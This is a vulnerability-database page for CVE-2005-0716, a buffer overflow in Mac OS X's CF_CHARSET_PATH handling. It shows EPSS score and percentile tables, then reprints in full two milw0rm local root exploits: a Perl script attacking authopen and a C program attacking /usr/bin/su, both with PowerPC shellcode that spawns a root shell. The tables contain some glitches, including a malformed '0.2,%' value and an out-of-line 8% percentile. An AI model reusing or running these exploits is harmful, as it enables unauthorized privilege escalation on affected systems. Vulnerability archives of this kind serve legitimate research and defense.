CVE-2005-0716 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	2.23%	–	–
2022-02-27	–	–	2.23%	–	–
2022-04-03	–	–	2.23%	–	–
2022-04-10	–	–	2.23%	–	–
2022-09-18	–	–	2.23%	–	–
2023-03-12	–	–	–	0.04%	–
2024-06-02	–	–	–	0.04%	–
2025-01-19	–	–	–	0.04%	–
2025-03-18	–	–	–	–	0.22%
2025-03-30	–	–	–	–	0.2%
2025-03-30	–	–	–	–	0.2,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	58%
2022-02-27	59%
2022-04-03	79%
2022-04-10	8%
2022-09-18	81%
2023-03-12	–
2024-06-02	–
2025-01-19	–
2025-03-18	43%
2025-03-30	39%
2025-03-30	39%

#!/usr/bin/perl # # http://www.digitalmunition.com # written by kf (kf_lists[at]digitalmunition[dot]com) # # Variant of CF_CHARSET_PATH a local root exploit by v9_at_fakehalo.us # # I was in the mood for some retro shit this morning, and I need root on some old ass G3 iMacs for a demo. # # I got sick of pressing enter on v9's exploit. It gets in the way when scripting attacks. # # Jill-Does-Computer:/tmp jilldoe$ ./authopen-CF_CHARSET.pl 0 # *** Target: 10.3.7 Build 7T65 on PowerPC, Padding: 1 # sh-2.05b# id # uid=502(jilldoe) euid=0(root) gid=502(jilldoe) groups=502(jilldoe), 79(appserverusr), 80(admin), 81(appserveradm) # # foreach $key (keys %ENV) { delete $ENV{$key}; } #// ppc execve() code by b-r00t + nemo to add seteuid(0) $sc = "\x7c\x63\x1a\x79" . "\x40\x82\xff\xfd" . "\x39\x40\x01\xc3" . "\x38\x0a\xfe\xf4" . "\x44\xff\xff\x02" . "\x39\x40\x01\x23" . "\x38\x0a\xfe\xf4" . "\x44\xff\xff\x02" . "\x60\x60\x60\x60" . "\x7c\xa5\x2a\x79" . "\x40\x82\xff\xfd" . "\x7d\x68\x02\xa6" . "\x3b\xeb\x01\x70" . "\x39\x40\x01\x70\x39\x1f\xfe\xcf" . "\x7c\xa8\x29\xae\x38\x7f\xfe\xc8" . "\x90\x61\xff\xf8\x90\xa1\xff\xfc" . "\x38\x81\xff\xf8\x38\x0a\xfe\xcb" . "\x44\xff\xff\x02\x7c\xa3\x2b\x78" . "\x38\x0a\xfe\x91\x44\xff\xff\x02" . "\x2f\x62\x69\x6e\x2f\x73\x68\x58"; $tgts{"0"} = "10.3.7 Build 7T65 on PowerPC:1"; $tgts{"1"} = "10.3.7 debug 0x41424344:0"; unless (($target) = @ARGV) { print "\n\nUsage: $0 <target> \n\nTargets:\n\n"; foreach $key (sort(keys %tgts)) { ($a,$b) = split(/\:/,$tgts{"$key"}); print "\t$key . $a\n"; } print "\n"; exit 1; } $ret = pack("l", ($retval)); ($a,$b) = split(/\:/,$tgts{"$target"}); print "*** Target: $a, Padding: $b\n"; # add a wrapper here if you want more than euid=0 open(SUSH,">/tmp/sh"); printf SUSH "/bin/csh -i\n"; $ENV{"CF_CHARSET_PATH"} = "A" x 1048 . pack('l', 0xbffffef6) x 2; $ENV{"APPL"} = "." x $b . "iiii" x 40 . $sc ; system("/usr/libexec/authopen /etc/master.passwd"); # milw0rm.com [2006-08-02]

/*[ MacOS X[CF_CHARSET_PATH]: local root exploit. ]********* * * * by: v9@fakehalo.us (fakehalo/realhalo) * * * * found by: iDefense (anon finder) * * * * saw the advisory on bugtraq and figured i'd slap this * * together, so simple i had to. exploits via the * * /usr/bin/su binary. you must press ENTER at the * * "Password: " prompt. * ***********************************************************/ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> static char exec[]= /* b-r00t's setuid(0)+exec(/bin/sh). */ "\x7c\x63\x1a\x79\x40\x82\xff\xfd\x7d\x68\x02\xa6\x3b\xeb" "\x01\x70\x39\x40\x01\x70\x39\x1f\xfe\xdf\x7c\x68\x19\xae" "\x38\x0a\xfe\xa7\x44\xff\xff\x02\x60\x60\x60\x60\x7c\xa5" "\x2a\x79\x38\x7f\xfe\xd8\x90\x61\xff\xf8\x90\xa1\xff\xfc" "\x38\x81\xff\xf8\x38\x0a\xfe\xcb\x44\xff\xff\x02\x7c\xa3" "\x2b\x78\x38\x0a\xfe\x91\x44\xff\xff\x02\x2f\x62\x69\x6e" "\x2f\x73\x68\x58"; int main(void){ unsigned int i=0; char *buf,*env[3]; printf("(*)MacOS X[CF_CHARSET_PATH]: local root exploit.\n"); printf("(*)by: v9@fakehalo.us, found by iDefense adv. (anon)\n\n"); if(!(buf=(char *)malloc(1100+1)))exit(1); memcpy(buf,"CF_CHARSET_PATH=",16); printf("[*] setting up the environment.\n"); for(i=16;i<1100;i+=4)*(long *)&buf[i]=(0xbffffffa-strlen(exec)); env[0]=buf; env[1]=exec; env[2]=NULL; printf("[*] executing su... (press ENTER at the \"Password: \"" " prompt)\n\n"); if(execle("/usr/bin/su","su",0,env)) printf("[!] failed executing /usr/bin/su.\n"); exit(0); } // milw0rm.com [2005-03-22]